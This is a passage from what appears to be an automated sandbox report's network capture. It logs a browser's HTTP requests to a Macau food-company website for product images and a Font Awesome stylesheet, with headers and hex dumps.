00 02 11 03 11 00 3f 00 df 7b f3 f2 cd 7c 0a 77 e2 94 ef c5 29 df 8a 53 bf 14 a7 7e 29 4e fc 52 9d f8 a5 3b f1 4a d7 ed ae 2d 34 cd 1b eb b5 d5 27 9a 9d 36 08 f3 2c 2e 6c e1 aa 88 b2 e4 8e 4a 89 02 42 37 c5 cc 0b 51 13 db cf 5f 1c aa 65 79 eb b7 3b 9c bd bf 63 b6 fe b3 14 f7 03 33 32 e8 59 83 44 13 cc 28 f4 f0 d6 48 ad 2c c5 11 6d d2 6a bc 14 da e9 6b f5 ad 83 6d 5b 39 f3 f7 eb 19 5d 12 a5 d1 e2 0e 30 c4 74 09 08 e6 2c 72 a1 1e e2 39 55 06 c4 62 22 79 f8 f2 84 d9 ed 9b 1e 2c fb 9b d9 b3 b3 7d 96 a8 50 0d a4 c5 ad 26 7d 22 dd 39 d7 02 88 05 a7 5a b1 9b a3 6a 7a cc 3b 63 6c 67 b4 b3 3d 7e d8 7d 74 4d ac 30 23 b1 e2 10 c6 4f 79 ce 28 4c a8 e4 47 2e 5a 88 b9 5f 0c b7 19 5b f2 f6 6d a6 cd 1c e7 2e c5 73 1c 5e 42 aa 20 00 6e d5 5b 5d 78 7c b4 e3 5d 38 95 41 99 e3 15 63 77 ad ea da be a5 bc d7 4c ac 91 69 63 45 b5 06 b6 35 c8 ce 00 15 51 d1 e4 b8 2b 97 45 2b 9a c4 46 a2 90 68 ef 5b b0 a8 e6 e3 97 ee fb 7e d7 65 b4 dc 63 64 2c c9 98 28 69 00 fd ad 1e 86 20 7e 4b 3e 63 cc 45 75 91 55 48 e8 6a 1c 9f ac e1 26 bd 6f 21 a1 9b 55 77 4d 1e b8 ce 64 fb 0a f2 38 df 30 e2 0b d0 b5 d1 d1 d2 22 a2 7b a8 e6 a9 1e ec a7 e7 0a bc a9 ff 00 cf 27 f5 dd a1 97 22 04 3e 67 43 37 90 a6 71 ac be 3f ba 45 c4 cf 85 70 e1 10 7a 88 e6 3e 9c a8 1a 3d 06 97 ec 3a bd 50 b0 ee 6c e7 56 6c 10 eb a6 12 41 a3 7c 39 8b ee a0 ca aa 17 47 57 0d 88 45 45 ea aa 4f 71 99 4e cc cf 64 26 cb b7 ed fb 8a 6d 8a e4 66 5c aa a6 4a d8 fa c1 f2 db 20 4f 2f 35 cb a4 ac cd 02 a2 b8 5d 78 d6 71 b9 2d 4b 36 6b 90 d3 41 35 74 48 f3 0e 25 8c 63 0c d8 7b 0a f4 55 1f b6 10 23 19 f8 ea de ab 8f fa 5e 7c 1e ea 31 0d ce 41 89 4a a8 62 20 90 79 9e 10 ab 03 a0 8d 3a 9a ab 24 5c 62 b7 01 e5 9f fa 5e 67 74 56 a3 6c a6 15 7c 3f 67 c2 23 fb 7e 9d 7c 7f 4e 7a f0 23 fd 33 4f e6 c7 e5 61 3f 4a d3 ff 00 7f 8e 95 97 8f 59 a7 3e 98 cb 9a c0 ca bd b6 1c 62 c8 bb f8 f6 11 83 fc 62 b0 ea 36 fb b5 ee 8e f3 94 7d 11 ae 52 30 88 df 57 8f 5c 78 f9 e1 db b0 b6 cb dd c6 0b bc 12 d0 ea 3d bd 63 5c 76 97 65 88 37 06 03 5d 62 35 a2 c1 6c 8d 4f eb c3 e5 5c d5 56 ef b1 d3 40 6d 54 39 a1 25 68 cf f2
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedH!A"1qBQa2R!1AQa"B2RqrC?{|w)S~)NR;J-4'6,.lJB7Q_ey;c32YD(H,mjkm[9]0t,r9Ub"y,}P&}"9Zjz;clg=~}tM0#Oy(LG.Z_[m.s^B n[]x|]8AcwLicE5Q+E+Fh[~ecd,(i ~K>cEuUHj&o!UwMd80"{'">gC7q?Epz>=:PlVlA|9GWEEOqNd&mf\J O/5]xq-K6kA5tH%c{U#^|1AJb y:$\b^gtVl|?g#~|Nz#3Oa?JY>bb6}R0W\x=c\ve7]b5lO\V@mT9%h
                                                                                                                                                              Mar 13, 2023 05:27:07.044584036 CET3429OUTData Raw: 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Mar 13, 2023 05:27:22.224941969 CET3451OUTGET /uploadfiles/SRL_3_1_3752094.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:22.460194111 CET3472INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 179772
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:24:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "7681d03aa8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 2a 47 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 f0 15 00 00 01 01 03 00 01 00 00 00 a0 0e 00 00 02 01 03 00 03 00 00 00 b6 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0f 01 02 00 06 00 00 00 bc 00 00 00 10 01 02 00 15 00 00 00 c2 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 d7 00 00 00 1b 01 05 00 01 00 00 00 df 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1e 00 00 00 e7 00 00 00 32 01 02 00 14 00 00 00 05 01 00 00 69 87 04 00 01 00 00 00 1c 01 00 00 38 03 00 00 08 00 08 00 08 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 49 00 00 9f 24 00 10 27 00 00 00 9f 24 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 32 20 31 30 3a 31 30 3a 31 35 00 00 00 00 1e 00 9a 82 05 00 01 00 00 00 8a 02 00 00 9d 82 05 00 01 00 00 00 92 02 00 00 22 88 03 00 01 00 00 00 01 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 32 31 03 90 02 00 14 00 00 00 9a 02 00 00 04 90 02 00 14 00 00 00 ae 02 00 00 01 92 0a 00 01 00 00 00 c2 02 00 00 02 92 05 00 01 00 00 00 ca 02 00 00 04 92 0a 00 01 00 00 00 d2 02 00 00 05 92 05 00 01 00 00 00 da 02 00 00 07 92 03 00 01 00 00 00 05 00 00 00 09 92 03 00 01 00 00 00 10 00 00 00 0a 92 05 00 01 00 00 00 e2 02 00 00 90 92 02 00 03 00 00 00 33 30 00 00 91 92 02 00 03 00 00 00 33 30 00 00 92 92 02 00 03 00 00 00 33 30 00 00 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 f4 01 00 00 03 a0 04 00 01 00 00 00 4e 01 00 00 0e a2 05 00 01 00 00 00 ea 02 00 00 0f a2 05 00 01 00 00 00 f2 02 00 00 10 a2 03 00 01 00 00 00 02 00 00 00 01 a4 03 00 01 00 00 00 00 00 00 00 02 a4 03 00 01 00 00 00 01 00 00 00 03 a4 03 00 01 00 00 00 01 00 00 00 06 a4 03 00 01 00 00 00 00 00 00 00 31 a4 02 00 0a 00 00 00 fa 02 00 00 32 a4 05 00 04 00 00 00 04 03 00 00 34 a4 02 00 14 00 00 00 24 03 00 00 00 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 00 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 80 b1 55 00 b3 05 00 00 00 21 39 00 be 03 00 00 39 33 30 36 31 31 30 36 37 00 64 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 46 31 30 30 6d 6d 20 66 2f 32 2e 38 20 4d 61 63 72 6f 00 06 00 03 01 03 00 01 00 00 00 06 00 00 00 1a 01 05 00 01 00 00 00 86 03 00 00 1b 01 05 00 01 00 00 00 8e 03 00 00 28 01 03 00 01 00 00 00 02 00 00 00 01 02 04 00 01 00 00 00 96 03 00 00 02 02 04 00 01 00 00 00 a9 26 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48
                                                                                                                                                              Data Ascii: *GExifII*(12i8CanonCanon EOS 5D Mark II$'$'Adobe Photoshop CS6 (Windows)2020:06:22 10:10:15"'d0221303030N124$2013:11:08 13:06:342013:11:08 13:06:34dU!9930611067ddEF100mm f/2.8 Macro(&HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-H
                                                                                                                                                              Mar 13, 2023 05:27:30.689251900 CET4558OUTGET /images/productMain_icon.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:30.910767078 CET4585INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 5536
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "9a831f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:36 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 28 00 c8 03 01 11 00 02 11 01 03 11 01 ff c4 00 ad 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 01 02 08 09 01 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 05 01 02 04 06 07 08 10 00 01 03 01 04 04 0c 04 04 04 07 00 00 00 00 00 03 01 02 04 05 00 11 12 06 21 13 15 07 31 52 92 d2 93 d3 14 54 94 55 16 18 41 51 22 08 61 71 81 32 a1 62 c2 23 91 42 72 82 a2 c3 24 11 00 01 02 03 05 04 08 06 02 01 03 05 00 00 00 00 01 11 02 00 03 04 21 51 d1 12 92 31 52 14 05 41 61 a1 d2 53 15 06 17 71 81 91 c1 22 13 b1 32 f1 f0 23 63 42 b2 33 43 07 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fa 69 bc 6c fd 58 9b 5c a9 44 5a 99 a0 d2 29 e7 ec d1 e1 c5 5c 2e 33 91 a8 e5 72 af 02 5c 8e 4b d5 6f e1 e0 b7 c0 bd 43 cd 67 f3 2a c9 cd 9a e3 fa d9 31 ec 6b 01 21 89 2d c5 8a e0 0a 39 ce 2d 25 5c a8 a8 12 29 2b aa 5e 1e 5a 0a 01 76 d3 62 c6 b0 f5 2b 93 f6 a4 97 27 cd f3 0a ab ff 00 1c 29 fc 2d e7 3c b6 97 c2 66 91 84 57 71 4e bd da 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c5 8d 43 3c c1 a4 c7 59 75 49 8d a7 46 6a dc b2 24 cf 28 99 7f ca f7 bd 12 fb 3c b6 97 c1 66 91 84 64 54 4c 3b 17 ea 63 0b 4b de e6 55 ad 48 48 94 ba fc 79 92 9c b7 0e 33 6a 05 42 39 7f 95 8e 7a 2b bf 44 b6 4f 2c a6 1f fa 59 a4 61 1b ba 6c d6 ed cd f5 38 c4 a1 33 33 ef 4b d2 4b 6e f8 b2 59 91 7f 4c 4a e4 fe 16 c7 97 52 f8 4c d2 30 88 f8 a7 5e 75 18 db bb b2 cf d5 78 f5 da 6d 30 d5 13 4f a2 d4 b1 8d 81
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed(!1RTUAQ"aq2b#Br$!Q1RAaSq"2#cB3C?ilX\DZ)\.3r\KoCg*1k!-9-%\)+^Zvb+')-<fWqN=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8C<YuIFj$(<fdTL;cKUHHy3jB9z+DO,Yal833KKnYLJRL0^uxm0O
                                                                                                                                                              Mar 13, 2023 05:27:31.593797922 CET4790OUTGET /uploadfiles/SRL_8_1_3753286.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:31.800652027 CET4894INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 225579
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:24:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "62e2f13aa8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:37 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 30 71 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 f0 15 00 00 01 01 03 00 01 00 00 00 a0 0e 00 00 02 01 03 00 03 00 00 00 b6 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0f 01 02 00 06 00 00 00 bc 00 00 00 10 01 02 00 15 00 00 00 c2 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 d7 00 00 00 1b 01 05 00 01 00 00 00 df 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1e 00 00 00 e7 00 00 00 32 01 02 00 14 00 00 00 05 01 00 00 69 87 04 00 01 00 00 00 1c 01 00 00 38 03 00 00 08 00 08 00 08 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 49 00 00 9f 24 00 10 27 00 00 00 9f 24 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 32 20 31 30 3a 31 31 3a 30 36 00 00 00 00 1e 00 9a 82 05 00 01 00 00 00 8a 02 00 00 9d 82 05 00 01 00 00 00 92 02 00 00 22 88 03 00 01 00 00 00 01 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 32 31 03 90 02 00 14 00 00 00 9a 02 00 00 04 90 02 00 14 00 00 00 ae 02 00 00 01 92 0a 00 01 00 00 00 c2 02 00 00 02 92 05 00 01 00 00 00 ca 02 00 00 04 92 0a 00 01 00 00 00 d2 02 00 00 05 92 05 00 01 00 00 00 da 02 00 00 07 92 03 00 01 00 00 00 05 00 00 00 09 92 03 00 01 00 00 00 10 00 00 00 0a 92 05 00 01 00 00 00 e2 02 00 00 90 92 02 00 03 00 00 00 33 30 00 00 91 92 02 00 03 00 00 00 33 30 00 00 92 92 02 00 03 00 00 00 33 30 00 00 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 f4 01 00 00 03 a0 04 00 01 00 00 00 4e 01 00 00 0e a2 05 00 01 00 00 00 ea 02 00 00 0f a2 05 00 01 00 00 00 f2 02 00 00 10 a2 03 00 01 00 00 00 02 00 00 00 01 a4 03 00 01 00 00 00 00 00 00 00 02 a4 03 00 01 00 00 00 01 00 00 00 03 a4 03 00 01 00 00 00 01 00 00 00 06 a4 03 00 01 00 00 00 00 00 00 00 31 a4 02 00 0a 00 00 00 fa 02 00 00 32 a4 05 00 04 00 00 00 04 03 00 00 34 a4 02 00 14 00 00 00 24 03 00 00 00 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 00 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 80 b1 55 00 b3 05 00 00 00 21 39 00 be 03 00 00 39 33 30 36 31 31 30 36 37 00 64 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 46 31 30 30 6d 6d 20 66 2f 32 2e 38 20 4d 61 63 72 6f 00 06 00 03 01 03 00 01 00 00 00 06 00 00 00 1a 01 05 00 01 00 00 00 86 03 00 00 1b 01 05 00 01 00 00 00 8e 03 00 00 28 01 03 00 01 00 00 00 02 00 00 00 01 02 04 00 01 00 00 00 96 03 00 00 02 02 04 00 01 00 00 00 d3 2c 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48
                                                                                                                                                              Data Ascii: 0qExifII*(12i8CanonCanon EOS 5D Mark II$'$'Adobe Photoshop CS6 (Windows)2020:06:22 10:11:06"'d0221303030N124$2013:11:08 13:06:342013:11:08 13:06:34dU!9930611067ddEF100mm f/2.8 Macro(,HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-H


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              21192.168.2.34970359.188.3.13280C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:05.613678932 CET363OUTGET /m/static/css/font-awesome.min.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:05.843621016 CET616INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 31000
                                                                                                                                                              Content-Type: text/css
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:15 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "56ccea5a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
                                                                                                                                                              Data Raw: 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d 34 2e 37 2e 30 27 29 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 23 69 65 66 69 78 26 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 32 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 3f 76 3d 34 2e 37 2e 30 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 66 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 3a 6e 6f 72 6d 61 6c 20 6e 6f 72 6d 61 6c 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 31 20 46 6f 6e 74 41 77 65 73 6f 6d 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2e 66 61 2d 6c 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 33 33 33 33 33 33 33 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 37 35 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 2d 31 35 25 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 65 6d 7d 2e 66 61 2d 35 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 65 6d 7d 2e 66 61 2d 66 77 7b 77 69 64 74 68 3a 31 2e 32 38 35 37 31 34 32 39 65 6d 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 61 2d 75 6c
